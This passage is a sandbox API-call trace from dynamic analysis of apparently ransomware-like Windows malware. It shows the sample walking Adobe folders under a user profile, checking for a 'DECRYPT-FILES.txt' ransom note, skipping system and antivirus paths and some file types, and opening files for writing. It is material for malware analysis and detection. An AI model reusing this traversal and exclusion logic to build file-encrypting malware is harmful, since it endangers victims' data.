lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0179.770] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\") returned 52 [0179.770] lstrlenW (lpString="0a16c9.tmp") returned 10 [0179.770] wsprintfW (in: param_1=0x36fe7f0, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\\\0a16c9.tmp") returned 63 [0179.770] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x264 [0179.780] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\") returned 52 [0179.780] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0179.780] wsprintfW (in: param_1=0x36fe7f0, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\\\DECRYPT-FILES.txt") returned 70 [0179.780] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.780] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\") returned 52 [0179.780] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\*" [0179.780] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\*", lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xee4751c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xee4751c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4798f8 [0179.780] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0179.780] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xee4751c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xee4751c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0179.781] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0179.781] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0179.781] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xee4751c0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xee4751c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xee4751c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0179.781] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0179.781] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0179.781] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0179.781] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0179.781] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0179.781] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0179.781] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0179.781] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0179.781] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0179.781] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0179.781] lstrlenW (lpString="0a16c9.tmp") returned 10 [0179.781] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0179.781] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0179.781] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0179.781] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0179.781] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\") returned 52 [0179.781] lstrlenW (lpString="0a16c9.tmp") returned 10 [0179.781] lstrcpyW (in: lpString1=0x36fe7e0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\" [0179.781] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\0a16c9.tmp" [0179.781] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0179.781] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.781] CloseHandle (hObject=0x0) returned 0 [0179.782] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.782] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xa9f498c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa9f498c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Acrobat", cAlternateFileName="")) returned 1 [0179.782] lstrcmpW (lpString1="Acrobat", lpString2=".") returned 1 [0179.782] lstrcmpW (lpString1="Acrobat", lpString2="..") returned 1 [0179.782] lstrcatW (in: lpString1="Acrobat", lpString2="\\" | out: lpString1="Acrobat\\") returned="Acrobat\\" [0179.782] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\", lpString2="Acrobat\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\" [0179.782] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\", lpSrch="\\Program Files") returned 0x0 [0179.782] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\", lpSrch=":\\Windows") returned 0x0 [0179.782] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\", lpSrch="\\Games\\") returned 0x0 [0179.782] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\", lpSrch="\\Tor Browser\\") returned 0x0 [0179.782] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\", lpSrch="\\ProgramData\\") returned 0x0 [0179.782] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0179.782] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0179.782] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0179.782] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\", lpSrch="\\All Users") returned 0x0 [0179.782] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\", lpSrch="\\IETldCache\\") returned 0x0 [0179.782] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\", lpSrch="\\Local Settings\\") returned 0x0 [0179.782] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\", lpSrch="\\AppData\\Local") returned 0x0 [0179.782] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\", lpSrch="AhnLab") returned 0x0 [0179.782] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0179.782] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\") returned 60 [0179.782] lstrlenW (lpString="0a16c9.tmp") returned 10 [0179.782] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\\\0a16c9.tmp") returned 71 [0179.782] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x26c [0179.783] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\") returned 60 [0179.783] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0179.783] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\\\DECRYPT-FILES.txt") returned 78 [0179.783] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.784] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\") returned 60 [0179.784] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\*" [0179.784] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\*", lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xee4751c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xee4751c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479938 [0179.784] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0179.784] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xee4751c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xee4751c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0179.784] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0179.784] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0179.784] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xee4751c0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xee4751c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xee4751c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0179.784] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0179.784] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0179.785] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0179.785] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0179.785] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0179.785] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0179.785] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0179.785] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0179.785] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0179.785] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0179.785] lstrlenW (lpString="0a16c9.tmp") returned 10 [0179.785] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0179.785] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0179.785] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0179.785] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0179.785] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\") returned 60 [0179.785] lstrlenW (lpString="0a16c9.tmp") returned 10 [0179.785] lstrcpyW (in: lpString1=0x36fe564, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\" [0179.785] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\0a16c9.tmp" [0179.785] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0179.785] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.785] CloseHandle (hObject=0x0) returned 0 [0179.785] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.786] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xa9f498c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa9f498c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="10.0", cAlternateFileName="")) returned 1 [0179.786] lstrcmpW (lpString1="10.0", lpString2=".") returned 1 [0179.786] lstrcmpW (lpString1="10.0", lpString2="..") returned 1 [0179.786] lstrcatW (in: lpString1="10.0", lpString2="\\" | out: lpString1="10.0\\") returned="10.0\\" [0179.786] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\", lpString2="10.0\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\" [0179.786] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\", lpSrch="\\Program Files") returned 0x0 [0179.786] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\", lpSrch=":\\Windows") returned 0x0 [0179.786] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\", lpSrch="\\Games\\") returned 0x0 [0179.786] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\", lpSrch="\\Tor Browser\\") returned 0x0 [0179.786] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\", lpSrch="\\ProgramData\\") returned 0x0 [0179.786] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0179.786] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0179.786] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0179.786] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\", lpSrch="\\All Users") returned 0x0 [0179.786] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\", lpSrch="\\IETldCache\\") returned 0x0 [0179.786] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\", lpSrch="\\Local Settings\\") returned 0x0 [0179.786] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\", lpSrch="\\AppData\\Local") returned 0x0 [0179.786] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\", lpSrch="AhnLab") returned 0x0 [0179.786] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0179.786] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\") returned 65 [0179.786] lstrlenW (lpString="0a16c9.tmp") returned 10 [0179.786] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\\\0a16c9.tmp") returned 76 [0179.786] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x274 [0179.791] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\") returned 65 [0179.791] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0179.791] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\\\DECRYPT-FILES.txt") returned 83 [0179.791] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.795] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\") returned 65 [0179.795] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\*" [0179.795] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\*", lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xee49b320, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xee49b320, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479978 [0179.795] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0179.795] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xee49b320, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xee49b320, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0179.795] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0179.795] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0179.795] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xee49b320, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xee49b320, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xee49b320, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0179.795] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0179.795] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0179.796] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0179.796] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0179.796] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0179.796] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0179.796] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0179.796] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0179.796] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0179.796] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0179.796] lstrlenW (lpString="0a16c9.tmp") returned 10 [0179.796] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0179.796] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0179.796] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0179.796] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0179.796] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\") returned 65 [0179.796] lstrlenW (lpString="0a16c9.tmp") returned 10 [0179.796] lstrcpyW (in: lpString1=0x36fe2e8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\" [0179.796] lstrcatW (in: 